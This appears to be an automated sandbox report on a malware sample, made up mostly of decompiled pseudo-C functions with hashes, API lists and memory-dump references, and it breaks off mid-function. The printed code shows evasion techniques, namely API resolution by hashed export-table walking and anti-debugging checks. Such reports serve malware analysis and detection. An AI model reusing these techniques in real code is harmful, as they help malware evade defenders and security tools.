                                                                • Instruction ID: 6d3e045a79c6e2c8e5452a1225aa452c876676451c682b84394679498180dc4d
                                                                • Opcode Fuzzy Hash: f192404d8f067382abebc66c544d2dd49c7ec5fffb51820aa044dc86159ef498
                                                                • Instruction Fuzzy Hash: 72E04FB1684214BBE61637F5AC0BFAB3A6CAB00B46F454060FB0DD9091E6E59454CBB6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,00406F5C,00000001), ref: 0040915F
                                                                • HeapDestroy.KERNEL32 ref: 00409195
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: Heap$CreateDestroy
                                                                • String ID:
                                                                • API String ID: 3296620671-0
                                                                • Opcode ID: 92aae64b270407912d518e77131d6aca4cd939e96d0cef8632c3047bb1d50248
                                                                • Instruction ID: 2ced5e660cfe8ae0ba1d47a83e54c941f4e17a663777465f9b4da150829e9e67
                                                                • Opcode Fuzzy Hash: 92aae64b270407912d518e77131d6aca4cd939e96d0cef8632c3047bb1d50248
                                                                • Instruction Fuzzy Hash: 73E09B717A43029EFB006B71AC0976A3594E74474BF10C43AF401E95E1F7B98D406A0D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0035D770() {
                                                                				char _v22;
                                                                
                                                                				GetConsoleCP();
                                                                				GetFileAttributesW(E00347200(0x3605f8,  &_v22)); // executed
                                                                				return GetCapture();
                                                                			}




                                                                0x0035d776
                                                                0x0035d78e
                                                                0x0035d798

                                                                APIs
                                                                • GetConsoleCP.KERNEL32 ref: 0035D776
                                                                • GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,0034AE51), ref: 0035D78E
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AttributesConsoleFile
                                                                • String ID:
                                                                • API String ID: 1533235433-0
                                                                • Opcode ID: 30eee3f2f3f8fd10f4b00b35118093d0bfca9d7171a901ebc9f46416e17efcfa
                                                                • Instruction ID: 0529ef11a2d0259e93e2f1a2bc15f8336033e852ef253e0fedab017a7a8c1ec1
                                                                • Opcode Fuzzy Hash: 30eee3f2f3f8fd10f4b00b35118093d0bfca9d7171a901ebc9f46416e17efcfa
                                                                • Instruction Fuzzy Hash: 49D0C7F1844109DBC64637A86C0F96B376C5904306F454460ED1555112E5E955588BB6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0035B1B0(intOrPtr _a4) {
                                                                				void* _t5;
                                                                				void* _t7;
                                                                				intOrPtr _t8;
                                                                
                                                                				_t8 = _a4;
                                                                				_t13 = _t8;
                                                                				if(_t8 == 0) {
                                                                					__eflags = 0;
                                                                					return 0;
                                                                				}
                                                                				_t5 = E00349D50(0xfef6f706);
                                                                				E0034BF50(_t13, 0, 0x8685de3);
                                                                				_t7 = RtlAllocateHeap( *0x362124, 0, _t8 + _t5 + 0x657d085a); // executed
                                                                				return _t7;
                                                                			}






                                                                0x0035b1b4
                                                                0x0035b1b7
                                                                0x0035b1b9
                                                                0x0035b1eb
                                                                0x00000000
                                                                0x0035b1eb
                                                                0x0035b1c0
                                                                0x0035b1d6
                                                                0x0035b1e7
                                                                0x00000000

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 0035B1E7
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 8726b5324b1f014dfe3b12db738a9038f56e92cb9ddd100c8644901687ad80f7
                                                                • Instruction ID: 880db52caa858b881169421ca168fe2522ddb03f618d31b5d12e6c55a6b31beb
                                                                • Opcode Fuzzy Hash: 8726b5324b1f014dfe3b12db738a9038f56e92cb9ddd100c8644901687ad80f7
                                                                • Instruction Fuzzy Hash: F7E0CD3394552477C6533BD0AC23F57BB8C4F05761F160020FD0DAB161D641771886E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                C-Code - Quality: 100%
                                                                			E003569A0(void* __eflags) {
                                                                				intOrPtr _v32;
                                                                				signed int _v36;
                                                                				void* _v44;
                                                                				signed char _t13;
                                                                				signed int _t16;
                                                                				signed int _t19;
                                                                				long _t23;
                                                                				void* _t24;
                                                                				void* _t25;
                                                                				void* _t27;
                                                                
                                                                				_t24 = CreateToolhelp32Snapshot(4, 0);
                                                                				_v44 = E00349D50(0x647400b0);
                                                                				_t23 = GetCurrentProcessId();
                                                                				_t13 = E003455C0(Thread32First(_t24,  &_v44), 0);
                                                                				_t27 = _t25 + 0xc;
                                                                				if((_t13 & 0x00000001) != 0) {
                                                                					L6:
                                                                					_t19 = 0;
                                                                				} else {
                                                                					0;
                                                                					0;
                                                                					while(GetLastError() != 0x12) {
                                                                						_t16 = E003455C0(_v32, _t23);
                                                                						_t27 = _t27 + 8;
                                                                						_t19 =  ~(_t16 & 0x00000001) & _v36;
                                                                						if(Thread32Next(_t24,  &_v44) != 0) {
                                                                							if(_t19 == 0) {
                                                                								continue;
                                                                							} else {
                                                                							}
                                                                						}
                                                                						goto L7;
                                                                					}
                                                                					goto L6;
                                                                				}
                                                                				L7:
                                                                				return _t19;
                                                                			}













                                                                0x003569b2
                                                                0x003569c1
                                                                0x003569ca
                                                                0x003569d9
                                                                0x003569de
                                                                0x003569e3
                                                                0x00356a25
                                                                0x00356a25
                                                                0x003569eb
                                                                0x003569eb
                                                                0x003569ef
                                                                0x003569f0
                                                                0x003569ff
                                                                0x00356a04
                                                                0x00356a11
                                                                0x00356a1d
                                                                0x00356a21
                                                                0x00000000
                                                                0x00000000
                                                                0x00356a23
                                                                0x00356a21
                                                                0x00000000
                                                                0x00356a1d
                                                                0x00000000
                                                                0x003569f0
                                                                0x00356a27
                                                                0x00356a30

                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003569AD
                                                                • GetCurrentProcessId.KERNEL32 ref: 003569C4
                                                                • Thread32First.KERNEL32(00000000,?), ref: 003569D1
                                                                • GetLastError.KERNEL32 ref: 003569F0
                                                                • Thread32Next.KERNEL32(00000000,?), ref: 00356A16
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1709709923-0
                                                                • Opcode ID: f2d3bf7754fa0d9b8ce3571bec0fbb46906b02a3df648ae89fd29f507f09f767
                                                                • Instruction ID: c859ee05f951d93ded99fe8031917ecf4edde84954fb168cb82e4a074d63b5cc
                                                                • Opcode Fuzzy Hash: f2d3bf7754fa0d9b8ce3571bec0fbb46906b02a3df648ae89fd29f507f09f767
                                                                • Instruction Fuzzy Hash: E601F7B2D403045BDB037BA4AC8BFEF3A6CEF42316F880131FD06BA123E91599188171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0040ED8D
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040EDA2
                                                                • UnhandledExceptionFilter.KERNEL32(0041DBB4), ref: 0040EDAD
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040EDC9
                                                                • TerminateProcess.KERNEL32(00000000), ref: 0040EDD0
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: 5e6373d3a001c1ad0d91735a7c6a97412289fda01af510d3ec8f30e9a9145520
                                                                • Instruction ID: 6ffbcf571de34dd6f0ef71b37fe811dd22c1f5601a27afb6255bb7d1e72886ec
                                                                • Opcode Fuzzy Hash: 5e6373d3a001c1ad0d91735a7c6a97412289fda01af510d3ec8f30e9a9145520
                                                                • Instruction Fuzzy Hash: 3621E6B8811708DFC708DF65F9456883BB4FB08344F40A03AE90897261E7BA66858F9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 97%
                                                                			E0034D830(signed int _a4, intOrPtr _a8) {
                                                                				signed short* _v20;
                                                                				CHAR* _v24;
                                                                				char _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				signed int _v40;
                                                                				char _v140;
                                                                				void* _t78;
                                                                				void* _t79;
                                                                				void* _t83;
                                                                				void* _t93;
                                                                				signed short* _t100;
                                                                				signed short* _t102;
                                                                				void* _t105;
                                                                				void* _t112;
                                                                				char _t113;
                                                                				signed short* _t114;
                                                                				void* _t115;
                                                                				void* _t120;
                                                                				signed int _t122;
                                                                				signed int _t124;
                                                                				signed int _t133;
                                                                				void* _t135;
                                                                				intOrPtr _t136;
                                                                				signed int _t137;
                                                                				signed int _t139;
                                                                				_Unknown_base(*)()* _t141;
                                                                				char* _t143;
                                                                				signed int _t144;
                                                                				void* _t149;
                                                                				signed short* _t153;
                                                                				signed int _t155;
                                                                				intOrPtr _t159;
                                                                				void* _t160;
                                                                				signed char* _t161;
                                                                				void* _t165;
                                                                				intOrPtr _t166;
                                                                				_Unknown_base(*)()* _t170;
                                                                				signed short* _t173;
                                                                				CHAR* _t174;
                                                                				signed int _t175;
                                                                				void* _t176;
                                                                				void* _t177;
                                                                				void* _t178;
                                                                				void* _t180;
                                                                				void* _t183;
                                                                				void* _t187;
                                                                				void* _t191;
                                                                				void* _t192;
                                                                				void* _t199;
                                                                
                                                                				_t133 = _a4;
                                                                				_t141 = 0;
                                                                				_t204 = _t133;
                                                                				if(_t133 != 0) {
                                                                					_t78 = E003512D0(_t204, _t133);
                                                                					_t149 = _t78;
                                                                					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
                                                                					_t79 = E00349D50(0x975b6640);
                                                                					_t141 = 0;
                                                                					_t180 = _t178 + 8;
                                                                					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
                                                                					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
                                                                						_t6 = _t165 + 0xcd09914; // 0xcd09914
                                                                						_t166 = _t79 + _t6;
                                                                						_v36 =  *((intOrPtr*)(_t149 + 0x64));
                                                                						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00349D50(0x60421690) + 0x436163c;
                                                                						_v32 = _t166;
                                                                						_t83 = E00341460(_t205, E00341460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
                                                                						_t183 = _t180 + 0x14;
                                                                						_v40 =  ~_t133;
                                                                						_t143 = _t83 + 0xa1511d8c;
                                                                						_t135 = 0;
                                                                						0;
                                                                						do {
                                                                							_v20 = _t153;
                                                                							_v24 = _t143;
                                                                							_t155 =  ~(E00341460(0,  ~( *_t143), _v40));
                                                                							E00341460(0,  *_t143, _a4);
                                                                							E00358F20( &_v140, E00349D50(0x647400c8));
                                                                							_t187 = _t183 + 0x1c;
                                                                							_t91 =  *_t155;
                                                                							if( *_t155 != 0) {
                                                                								_t176 = 0;
                                                                								do {
                                                                									 *((char*)(_t177 + _t176 - 0x88)) = E0035D680(0, _t91);
                                                                									_t176 = _t176 - E003422E0(0, 0, 1);
                                                                									E00341460(0, _t176, 1);
                                                                									_t187 = _t187 + 0x14;
                                                                									_t91 =  *(_t155 + _t176) & 0x000000ff;
                                                                								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
                                                                							}
                                                                							_push(0xffffffff);
                                                                							_t93 = E003500A0( &_v140);
                                                                							_t183 = _t187 + 8;
                                                                							if(_t93 == _a8) {
                                                                								_t136 = _v32;
                                                                								_t170 = E00341460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00349D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
                                                                								_t100 = E003422E0(__eflags, _t136, 0x52cc09fc);
                                                                								_t159 = _v36;
                                                                								_v20 = _t100;
                                                                								E00341460(__eflags, _t136, _t159);
                                                                								_t141 = _t170;
                                                                								_t191 = _t183 + 0x1c;
                                                                								__eflags = _t170 - _t136;
                                                                								if(_t170 > _t136) {
                                                                									_t102 = _v20;
                                                                									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
                                                                									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
                                                                										_v24 =  *_t141;
                                                                										_v20 = _t141;
                                                                										_t105 = E00347DD0(0x82);
                                                                										_t192 = _t191 + 4;
                                                                										_t144 = _v24;
                                                                										_t137 = 0;
                                                                										__eflags = _t144 - _t105;
                                                                										if(_t144 != _t105) {
                                                                											_t122 = _t144;
                                                                											_t175 = 0;
                                                                											__eflags = 0;
                                                                											0;
                                                                											do {
                                                                												 *(_t177 + _t175 - 0x88) = _t122;
                                                                												_t124 = E00341460(__eflags, E003422E0(__eflags, 0, _t175), 0xffffffff);
                                                                												_t137 =  ~_t124;
                                                                												E00341460(__eflags, _t175, 1);
                                                                												_t192 = _t192 + 0x18;
                                                                												_t175 = _t137;
                                                                												_t122 =  *(_v20 - _t124) & 0x000000ff;
                                                                												__eflags = _t122 - 0x2e;
                                                                											} while (__eflags != 0);
                                                                										}
                                                                										_t160 = E00341460(__eflags, _t137, E00349D50(0x3638cbc4));
                                                                										E00341460(__eflags, _t137, 1);
                                                                										_v24 = _v20 + _t160 - 0x524ccb67;
                                                                										 *((char*)(_t177 + _t137 - 0x88)) = E00347DD0(0x82);
                                                                										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
                                                                										_t112 = E00349D50(0x8707952b);
                                                                										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
                                                                										_t113 = E00347DD0(0xc0);
                                                                										_v28 = 0;
                                                                										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
                                                                										_t114 = _v20;
                                                                										 *((char*)(_t177 + _t137 - 0x84)) = 0;
                                                                										_t173 = _t114;
                                                                										_t115 = E00347DD0(0x8f);
                                                                										_t199 = _t192 + 0x24;
                                                                										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
                                                                										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
                                                                											_t174 = _v24;
                                                                										} else {
                                                                											_t139 = _v24[1];
                                                                											__eflags = _t139;
                                                                											if(_t139 == 0) {
                                                                												_t174 =  &_v28;
                                                                											} else {
                                                                												_t161 = _t160 + _t173 - 0x524ccb65;
                                                                												do {
                                                                													_t120 = E003455A0(_v28, 0xa);
                                                                													_t199 = _t199 + 8;
                                                                													_v28 = _t139 + _t120 - 0x30;
                                                                													_t139 =  *_t161 & 0x000000ff;
                                                                													_t161 =  &(_t161[1]);
                                                                													__eflags = _t139;
                                                                												} while (_t139 != 0);
                                                                												_t174 =  &_v28;
                                                                											}
                                                                										}
                                                                										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
                                                                									}
                                                                								}
                                                                							} else {
                                                                								goto L7;
                                                                							}
                                                                							goto L22;
                                                                							L7:
                                                                							_t135 = _t135 + 1;
                                                                							_t143 =  &(_v24[4]);
                                                                							_t153 =  &(_v20[1]);
                                                                						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
                                                                						_t141 = 0;
                                                                					}
                                                                				}
                                                                				L22:
                                                                				return _t141;
                                                                			}





















































                                                                0x0034d839
                                                                0x0034d83c
                                                                0x0034d83e
                                                                0x0034d840
                                                                0x0034d847
                                                                0x0034d852
                                                                0x0034d854
                                                                0x0034d85b
                                                                0x0034d860
                                                                0x0034d862
                                                                0x0034d865
                                                                0x0034d86d
                                                                0x0034d873
                                                                0x0034d873
                                                                0x0034d880
                                                                0x0034d894
                                                                0x0034d89f
                                                                0x0034d8af
                                                                0x0034d8b4
                                                                0x0034d8bb
                                                                0x0034d8be
                                                                0x0034d8c4
                                                                0x0034d8cc
                                                                0x0034d8d0
                                                                0x0034d8d2
                                                                0x0034d8d5
                                                                0x0034d8ea
                                                                0x0034d8f0
                                                                0x0034d90d
                                                                0x0034d912
                                                                0x0034d915
                                                                0x0034d919
                                                                0x0034d91b
                                                                0x0034d920
                                                                0x0034d92c
                                                                0x0034d942
                                                                0x0034d944
                                                                0x0034d949
                                                                0x0034d94c
                                                                0x0034d950
                                                                0x0034d920
                                                                0x0034d954
                                                                0x0034d95d
                                                                0x0034d962
                                                                0x0034d968
                                                                0x0034d98d
                                                                0x0034d9c4
                                                                0x0034d9d0
                                                                0x0034d9d8
                                                                0x0034d9db
                                                                0x0034d9e0
                                                                0x0034d9e5
                                                                0x0034d9e7
                                                                0x0034d9ea
                                                                0x0034d9ec
                                                                0x0034d9f2
                                                                0x0034d9fc
                                                                0x0034d9fe
                                                                0x0034da06
                                                                0x0034da0e
                                                                0x0034da11
                                                                0x0034da16
                                                                0x0034da19
                                                                0x0034da1c
                                                                0x0034da1e
                                                                0x0034da20
                                                                0x0034da22
                                                                0x0034da24
                                                                0x0034da24
                                                                0x0034da2c
                                                                0x0034da30
                                                                0x0034da30
                                                                0x0034da45
                                                                0x0034da51
                                                                0x0034da56
                                                                0x0034da5b
                                                                0x0034da61
                                                                0x0034da65
                                                                0x0034da68
                                                                0x0034da68
                                                                0x0034da30
                                                                0x0034da83
                                                                0x0034da88
                                                                0x0034da9a
                                                                0x0034daaa
                                                                0x0034dab1
                                                                0x0034dabe
                                                                0x0034dac8
                                                                0x0034dad7
                                                                0x0034dae5
                                                                0x0034daec
                                                                0x0034daf3
                                                                0x0034daf6
                                                                0x0034db05
                                                                0x0034db0c
                                                                0x0034db11
                                                                0x0034db14
                                                                0x0034db16
                                                                0x0034db54
                                                                0x0034db18
                                                                0x0034db1e
                                                                0x0034db21
                                                                0x0034db23
                                                                0x0034db59
                                                                0x0034db25
                                                                0x0034db25
                                                                0x0034db30
                                                                0x0034db35
                                                                0x0034db3a
                                                                0x0034db44
                                                                0x0034db47
                                                                0x0034db4a
                                                                0x0034db4b
                                                                0x0034db4b
                                                                0x0034db4f
                                                                0x0034db4f
                                                                0x0034db23
                                                                0x0034db70
                                                                0x0034db70
                                                                0x0034d9fe
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0034d96a
                                                                0x0034d973
                                                                0x0034d974
                                                                0x0034d977
                                                                0x0034d97a
                                                                0x0034d983
                                                                0x0034d983
                                                                0x0034d86d
                                                                0x0034db72
                                                                0x0034db7b

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?), ref: 0034DB62
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0034DB6A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: d$l
                                                                • API String ID: 2574300362-91452987
                                                                • Opcode ID: dae8e1eacc054fb23c3bc94692593f5ad4f88f7197a390fbac78c81bda41fb80
                                                                • Instruction ID: 2c122e1ab5869a2172bb74f0fd5b8b6c189e35554fd9ddaeffada8e9597fcb52
                                                                • Opcode Fuzzy Hash: dae8e1eacc054fb23c3bc94692593f5ad4f88f7197a390fbac78c81bda41fb80
                                                                • Instruction Fuzzy Hash: 899148B6D002159BDB119FB4EC42ABE7BF4AF16318F050064EC49BF352E635BA0887A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00341A00() {
                                                                				intOrPtr _t9;
                                                                				WCHAR* _t10;
                                                                				struct HINSTANCE__* _t15;
                                                                
                                                                				_t9 =  *0x3620d8; // 0x53325ec4
                                                                				_t10 = _t9 + 0xffffffd4;
                                                                				_t15 = (_t10 | 0x00000008) * _t10;
                                                                				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
                                                                				GetVersion();
                                                                				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
                                                                			}






                                                                0x00341a06
                                                                0x00341a0c
                                                                0x00341a15
                                                                0x00341a1d
                                                                0x00341a39
                                                                0x00341a47

                                                                APIs
                                                                • CreateDialogParamW.USER32 ref: 00341A1D
                                                                • GetVersion.KERNEL32(?,00348614,0000031F,?,00346AB1,?,0034AE51), ref: 00341A39
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CreateDialogParamVersion
                                                                • String ID:
                                                                • API String ID: 1068622756-0
                                                                • Opcode ID: f2259b058e93ced3231a404223f2d435acc08d5e358a7aea866996fd719474f5
                                                                • Instruction ID: 227c8781535070a56daae10df65635332e05aba6f04aee2952e467daca5214a9
                                                                • Opcode Fuzzy Hash: f2259b058e93ced3231a404223f2d435acc08d5e358a7aea866996fd719474f5
                                                                • Instruction Fuzzy Hash: 49E0D8336039386B52118AAFADC5C97FF9CDE422BA3020237FA5CD36B0D1504C0886F4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 90%
                                                                			E0035DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
                                                                				unsigned int _v20;
                                                                				signed int _v24;
                                                                				signed int* _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				signed int* _v40;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				signed int* _v52;
                                                                				signed int _v56;
                                                                				signed int _v60;
                                                                				intOrPtr _v64;
                                                                				intOrPtr _v68;
                                                                				signed int _v72;
                                                                				signed int _v76;
                                                                				signed int _v80;
                                                                				signed int _v84;
                                                                				intOrPtr _v88;
                                                                				intOrPtr _v92;
                                                                				intOrPtr _v96;
                                                                				intOrPtr _v100;
                                                                				intOrPtr _v104;
                                                                				intOrPtr _v108;
                                                                				signed int _v112;
                                                                				intOrPtr _v116;
                                                                				intOrPtr _v120;
                                                                				signed int _v124;
                                                                				signed int _v128;
                                                                				void* _t304;
                                                                				signed int _t305;
                                                                				signed int _t309;
                                                                				void* _t311;
                                                                				signed int _t314;
                                                                				signed int _t317;
                                                                				signed int* _t319;
                                                                				signed int _t328;
                                                                				signed int _t329;
                                                                				void* _t331;
                                                                				void* _t336;
                                                                				void* _t338;
                                                                				void* _t344;
                                                                				intOrPtr _t347;
                                                                				void* _t355;
                                                                				signed int _t358;
                                                                				void* _t360;
                                                                				signed int _t366;
                                                                				signed int _t368;
                                                                				void* _t369;
                                                                				signed int _t376;
                                                                				signed int* _t377;
                                                                				signed int _t379;
                                                                				signed int _t380;
                                                                				void* _t383;
                                                                				signed int _t387;
                                                                				void* _t396;
                                                                				void* _t401;
                                                                				signed int _t408;
                                                                				void* _t409;
                                                                				void* _t410;
                                                                				void* _t412;
                                                                				intOrPtr _t414;
                                                                				void* _t415;
                                                                				signed int _t418;
                                                                				signed int _t421;
                                                                				void* _t425;
                                                                				void* _t426;
                                                                				signed char _t427;
                                                                				signed int _t432;
                                                                				intOrPtr _t434;
                                                                				signed char _t444;
                                                                				signed int _t445;
                                                                				intOrPtr _t450;
                                                                				signed int _t457;
                                                                				signed int _t459;
                                                                				signed int _t460;
                                                                				signed int* _t461;
                                                                				signed int* _t463;
                                                                				signed int _t464;
                                                                				signed int _t465;
                                                                				signed int* _t466;
                                                                				signed int _t471;
                                                                				signed int _t472;
                                                                				intOrPtr* _t475;
                                                                				signed int* _t476;
                                                                				signed int _t478;
                                                                				signed int _t479;
                                                                				signed int _t481;
                                                                				signed int* _t484;
                                                                				unsigned int _t486;
                                                                				unsigned int _t490;
                                                                				signed int _t491;
                                                                				intOrPtr _t492;
                                                                				signed int _t495;
                                                                				signed int _t498;
                                                                				signed int _t502;
                                                                				signed int _t503;
                                                                				signed int _t506;
                                                                				signed char _t507;
                                                                				intOrPtr* _t510;
                                                                				signed int _t525;
                                                                				signed int _t527;
                                                                				signed int _t532;
                                                                				signed int _t533;
                                                                				signed int _t542;
                                                                				signed int _t543;
                                                                				intOrPtr _t549;
                                                                				intOrPtr* _t551;
                                                                				signed int _t552;
                                                                				void* _t566;
                                                                				signed int _t569;
                                                                				signed int _t570;
                                                                				signed int* _t576;
                                                                				signed int _t581;
                                                                				signed int _t582;
                                                                				signed int* _t584;
                                                                				signed int _t586;
                                                                				signed int _t590;
                                                                				signed int _t592;
                                                                				signed int _t595;
                                                                				signed int _t599;
                                                                				void* _t600;
                                                                				void* _t602;
                                                                				void* _t604;
                                                                				void* _t606;
                                                                				void* _t621;
                                                                				void* _t629;
                                                                				void* _t632;
                                                                				void* _t633;
                                                                				void* _t634;
                                                                				void* _t635;
                                                                
                                                                				_t532 = __edx;
                                                                				_t455 = _a12;
                                                                				_t584 = E0035EC10();
                                                                				_v28 = E0035EC10();
                                                                				_t549 = E0035EC10();
                                                                				_v68 = E0035EC10();
                                                                				_v40 = E0035EC10();
                                                                				_v80 = E0035EC10();
                                                                				_t304 = E0035E3C0(__ecx, __eflags, _a12, _a16);
                                                                				_t602 = _t600 - 0x70 + 8;
                                                                				if(_t304 == 0) {
                                                                					_t305 = E0035EBE0(_t455);
                                                                					_t602 = _t602 + 4;
                                                                					__eflags = _t305;
                                                                					if(_t305 == 0) {
                                                                						_v64 = _t549;
                                                                						_v52 = _t584;
                                                                						_t457 =  *_a16;
                                                                						__eflags = _t457 - 1;
                                                                						if(__eflags != 0) {
                                                                							_v24 =  *_a12;
                                                                							_t490 = E00341460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
                                                                							_t309 = _a4;
                                                                							_v44 = _t457;
                                                                							_v20 = _t490;
                                                                							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
                                                                							_t311 = E003422E0(__eflags, _t56, _t457);
                                                                							_t604 = _t602 + 0x10;
                                                                							_t459 = _t311 + 0xc20bc3c9;
                                                                							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
                                                                							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
                                                                								_t432 = _a4;
                                                                								_t581 = _t432;
                                                                								 *(_t432 + 4) = _t459;
                                                                								_t434 = E00343F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
                                                                								_t604 = _t604 + 8;
                                                                								 *((intOrPtr*)(_t581 + 8)) = _t434;
                                                                							}
                                                                							_t551 = _v28;
                                                                							E00347D70(_a12, _t551);
                                                                							E00347D70(_a16, _t584);
                                                                							_t606 = _t604 + 0x10;
                                                                							_t314 =  *_t584;
                                                                							_t491 = _t584[2];
                                                                							_v32 = _t459;
                                                                							__eflags =  *(_t491 + _t314 * 4 - 4);
                                                                							if( *(_t491 + _t314 * 4 - 4) < 0) {
                                                                								_v56 = 0;
                                                                								_t460 = 1;
                                                                								goto L25;
                                                                							} else {
                                                                								_t525 = 0;
                                                                								__eflags = 0;
                                                                								_t481 = 1;
                                                                								do {
                                                                									_v56 = (_t525 << 0x00000020 | _t481) << 1;
                                                                									_v60 = _t481 + _t481;
                                                                									E0035E320(_t584, 0x362028);
                                                                									_t425 = E00341460(__eflags, E00349D50(0xfa78285f) +  *_t584, 0xffffffff);
                                                                									_t426 = E00349D50(0xfa78285f);
                                                                									_t481 = _v60;
